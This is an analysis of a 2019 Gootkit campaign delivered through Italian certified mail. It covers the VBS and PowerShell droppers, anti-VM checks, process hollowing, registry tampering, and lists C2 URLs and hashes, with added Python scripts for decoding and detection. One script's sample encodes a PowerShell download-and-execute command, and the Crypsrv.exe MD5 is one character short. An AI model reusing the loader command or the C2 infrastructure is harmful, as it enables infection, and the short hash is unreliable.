
Gootkit malware campaign again from Italian certified mail

15-05-2019

In recent weeks, Italian public administrations have been targeted by several malspam campaigns. Behind some of them, artifacts belonging to the Gootkit malware family have been identified. The following analysis covers the most recently detected Gootkit sample.

Analysis

The following analysis concerns an e-mail carrying the file ITXXXXXXX.zip as an attachment, where XXXXXXX is a string of 7 random digits. The subject of the e-mail refers to a non-existent document from INPS (the Italian social-security institute).

Inside the attached zip file is IT60315662813266170515781647592.vbs, a script made of several obfuscated functions.

Deobfuscating the vbs file yields the following payload, which is run through PowerShell:

The command above converts an array of integers to the corresponding ASCII characters and launches the resulting string as a command. The decoded command is shown below:

From the image it is clear that the decoded code checks that:

• the system language is not Romanian, Ukrainian, Belarusian or Chinese;
• the execution environment is NOT virtualized.

If both checks pass, the code downloads two files from the following URLs:

Win00ce.js    hxxp://ema.emeraldsurfsciences.com/v2i.php?need=js&vid=pec10vbs&cvzfx
Crypsrv.exe   hxxp://vdd.c21paul.info/api?Iwtsg

The two files are then executed on the victim's operating system.

The Win00ce.js file consists of JavaScript instructions, which for completeness are reported below (in part):

That snippet is reconstructed through shift operations; the resulting code is shown below (detail):

The result of the operation highlighted in the red box is added to each integer of the array, and each sum is then converted to its ASCII character. The result is shown below:
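Both decoding steps above, the first-stage PowerShell array that goes straight through [char], and the Win00ce.js array to which a computed constant is added before the conversion, can be reproduced with a short script. This is an added example and not code from the original analysis: the PowerShell one-liner and the JS integer array below are constructed for illustration, and the script goes one step further than the text by brute-forcing the additive constant (ranking candidates on tokens a dropper stage is expected to contain) for the cases where the constant is not obvious from the obfuscated JS.

```python
"""Decode the integer-array obfuscation used by the VBS/PowerShell stage (plain
[char] conversion) and by the Win00ce.js stage (a constant is added first)."""
import re
import string

# Tokens a decoded dropper stage is expected to contain; used to rank candidate
# offsets when the additive constant is not obvious from the script.
KEYWORDS = ("ActiveXObject", "WScript", "http", "iex", "New-Object",
            "DownloadString", "DownloadFile")
PRINTABLE = set(string.printable)

# Constructed sample of the first stage: a PowerShell one-liner whose payload is
# an integer array piped through [char] (not the real campaign command).
PS_SAMPLE = (
    'powershell -nop -w hidden -c "iex (-join ((105,101,120,32,40,105,119,114,32,39,'
    '104,116,116,112,58,47,47,101,120,97,109,112,108,101,46,105,110,118,97,108,105,'
    '100,47,118,50,105,46,112,104,112,39,41,46,67,111,110,116,101,110,116)'
    '|%{[char]$_}))"'
)

# Constructed sample of the second layer: every code point was stored minus a
# constant (here 7) that the JS computes at run time and adds back.
JS_ARRAY = [103, 94, 112, 25, 58, 92, 109, 98, 111, 94, 81, 72, 91, 99, 94, 92,
            109, 33, 32, 80, 76, 92, 107, 98, 105, 109, 39, 76, 97, 94, 101, 101,
            32, 34]


def extract_int_array(script: str) -> list:
    """Return the longest comma-separated run of integers found in `script`."""
    runs = re.findall(r"-?\d+(?:\s*,\s*-?\d+){3,}", script)
    if not runs:
        return []
    return [int(x) for x in max(runs, key=len).split(",")]


def decode_int_array(values, offset: int = 0) -> str:
    """Add `offset` to each integer and map it to its character.  offset=0 is the
    PowerShell [char] conversion; a non-zero offset is the JS add-then-convert step."""
    return "".join(chr(v + offset) for v in values)


def brute_force_offset(values, keywords=KEYWORDS, search=range(-128, 129)):
    """Try every additive constant in `search`, discard results that are not fully
    printable, and return (offset, text) for the candidate with the most keyword
    hits, or None when no candidate looks like script code."""
    best = None
    for k in search:
        shifted = [v + k for v in values]
        if min(shifted) < 9 or max(shifted) > 126:
            continue
        text = "".join(chr(c) for c in shifted)
        if not all(ch in PRINTABLE for ch in text):
            continue
        hits = sum(kw in text for kw in keywords)
        if hits and (best is None or hits > best[2]):
            best = (k, text, hits)
    return None if best is None else (best[0], best[1])


if __name__ == "__main__":
    print(decode_int_array(extract_int_array(PS_SAMPLE)))
    print(brute_force_offset(JS_ARRAY))
```

The keyword list is the only tuning knob: when a stage is expected to contain other tokens (a known URL path, a WMI class name), add them so the ranking prefers the right offset over candidates that are merely printable.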

The code shows that the language check is repeated (this time the system language must not be Chinese, Romanian, Russian, Ukrainian or Belarusian), together with the check that the execution environment is NOT virtualized.

If the checks pass, the code downloads two files from the following URLs:

WindowsIndexingService.js   hxxp://zzi.belltowers.ca/v2i.php?need=js&
documents                   hxxp://zzi.belltowers.ca/v2i.php?need=body&

Unfortunately, at the time of analysis the two URLs shown were not reachable.

The hashes of the PE Crypsrv.exe are listed at the end of this article.
Dynamic analysis showed that the executable relies on the advpack.dll library to make itself persistent, so that it is started automatically every time the OS restarts.

A peculiarity of this malware is its use of so-called process hollowing, whereby a legitimate process acts as a container for the malicious one.

Memory is allocated inside the initial process to host the malicious code.
Extracting the injected code and analysing it statically revealed two domains:

ssw.138front[.]com
martatov[.]top

The following is the evidence:
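The memory allocated inside the host process is also what gives the technique away: the operating system maps legitimate modules as image-backed (MEM_IMAGE) memory, so an executable private region that starts with a PE header is the classic hollowing indicator, and carving that region is how the two domains above were recovered. The scanner below is an added example, not code from the original analysis; it runs over a constructed list of regions shaped like VirtualQueryEx output (hypothetical base addresses, minimal fake PE headers, and the domains taken from this article's IoCs) rather than over a live process.

```python
"""Flag process-hollowing residue (a PE header in private executable memory)
and carve domain-like strings from the flagged region."""
import re
import struct

# Memory-region constants as reported by VirtualQueryEx (MEMORY_BASIC_INFORMATION).
MEM_PRIVATE = 0x20000            # allocated with VirtualAlloc, not backed by a file
MEM_IMAGE = 0x1000000            # a module mapped by the loader (legitimate EXE/DLL)
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
EXECUTABLE = {PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE}


def build_fake_pe(payload: bytes) -> bytes:
    """Constructed test data: a DOS header whose e_lfanew points at a 'PE\\0\\0'
    signature, followed by `payload`. Only the fields the detector reads are set."""
    blob = bytearray(0x80)
    blob[0:2] = b"MZ"
    struct.pack_into("<I", blob, 0x3C, 0x80)    # e_lfanew = 0x80
    return bytes(blob) + b"PE\x00\x00" + payload


def is_pe_header(data: bytes) -> bool:
    """True if `data` starts with a DOS header whose e_lfanew lands on a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_hollowed_regions(regions):
    """Flag executable, private (non-image) regions that carry a PE header.
    A module loaded by the OS is MEM_IMAGE; a PE sitting in MEM_PRIVATE memory is
    what process hollowing (or manual mapping) leaves behind."""
    return [r for r in regions
            if r["type"] == MEM_PRIVATE
            and r["protect"] in EXECUTABLE
            and is_pe_header(r["data"])]


DOMAIN_RE = re.compile(rb"(?:[a-z0-9-]+\.)+[a-z]{2,}")   # lowercase ASCII only
NOT_DOMAINS = {"dll", "exe", "sys", "php"}                # file extensions that look like TLDs


def carve_domains(data: bytes) -> list:
    """Pull domain-looking ASCII strings out of a carved region and defang them
    the way the IoC list does (last dot wrapped in brackets)."""
    out = set()
    for m in DOMAIN_RE.findall(data):
        name = m.decode("ascii")
        if name.rsplit(".", 1)[1] in NOT_DOMAINS:
            continue
        out.add("[.]".join(name.rsplit(".", 1)))
    return sorted(out)


def scan(regions) -> dict:
    """Map the base address of every suspicious region to the domains carved from it."""
    return {hex(r["base"]): carve_domains(r["data"]) for r in find_hollowed_regions(regions)}


# Constructed region list: a legitimate mapped image, a plain heap-like buffer,
# and the private RWX region hosting the injected Gootkit code (bases are hypothetical).
REGIONS = [
    {"base": 0x00400000, "type": MEM_IMAGE, "protect": PAGE_EXECUTE_READ,
     "data": build_fake_pe(b"legitimate host image")},
    {"base": 0x00600000, "type": MEM_PRIVATE, "protect": PAGE_READWRITE,
     "data": b"\x00" * 0x100},
    {"base": 0x02A00000, "type": MEM_PRIVATE, "protect": PAGE_EXECUTE_READWRITE,
     "data": build_fake_pe(b"kernel32.dll\x00ssw.138front.com\x00martatov.top\x00/rbody32\x00")},
]

if __name__ == "__main__":
    for base, domains in scan(REGIONS).items():
        print(base, domains)
```

On a real system the region list comes from walking VirtualQueryEx over the suspect process (or from a memory image, where Volatility's malfind plugin applies the same private-executable-memory heuristic); the PE header found in the flagged region is then dumped to disk for the static analysis described above.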

The malware also sets some environment variables, such as crackmeololo, crackme, trustedcomp and true. The following is the evidence:

Also, by accessing and modifying the registry keys indicated below, the executable:
• ensures persistence on the system even when the PC is booted in safe mode;
• modifies the Software Restriction Policies (SRP) so that untrusted software can be launched with elevated privileges.

Furthermore, the executable weakens the security of the PC by modifying the Internet Explorer security zones (0 = My Computer, 1 = Local intranet, 2 = Trusted sites, 3 = Internet, 4 = Restricted sites) in the Windows registry:

KEY                                                                                                                         VALUE
HKEY_USERS\S-1-5-21-2580483871-590521980-3826313501-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONES\1   3
HKEY_USERS\S-1-5-21-2580483871-590521980-3826313501-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONES\2   3
HKEY_USERS\S-1-5-21-2580483871-590521980-3826313501-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONES\3   3
HKEY_USERS\S-1-5-21-2580483871-590521980-3826313501-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONES\4   3
HKEY_USERS\S-1-5-21-2580483871-590521980-3826313501-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONES\0   3


The executable connects to the C2 server to download the third stage, which is then injected into memory.
The request is made to the following URL:

hxxp://ssw.138front.com/rbody32

Below are the headers the malware sets when requesting the third stage:

Altogether, Crypsrv.exe is a Trojan belonging to the Gootkit family, and the zip file containing the vbs appears to be a second-stage dropper.

Hashes:

Crypsrv.exe

MD5 763804AA3B199BFE17E764A289D7735
SHA-1 CDC716F843A00F34325C87EFD9284CB30AF999AC
SHA-256 EA0BC812663FC5A49E44651AF0D1F4226D69FAF14C80D6CC4E8EC4CC82D12717

rbody32 (third stage)

MD5 C9C42FCA0C6220EE49E5947FC9AE4E0B
SHA-1 507749D4766D8D396AA33B31ED710E312F46A2F6
SHA-256 1B91110A9DB7998BB00716716297D0516CB5190C98B5664101E38F0FB9F75A4D

IoC

hxxp://ema.emeraldsurfsciences.com/v2i.php?need=js&vid=pec10vbs&cvzfx

hxxp://vdd.c21paul.info/api?Iwtsg

hxxp://zzi.belltowers.ca/v2i.php?need=js&

hxxp://zzi.belltowers.ca/v2i.php?need=body&

ssw.138front[.]com

martatov[.]top 
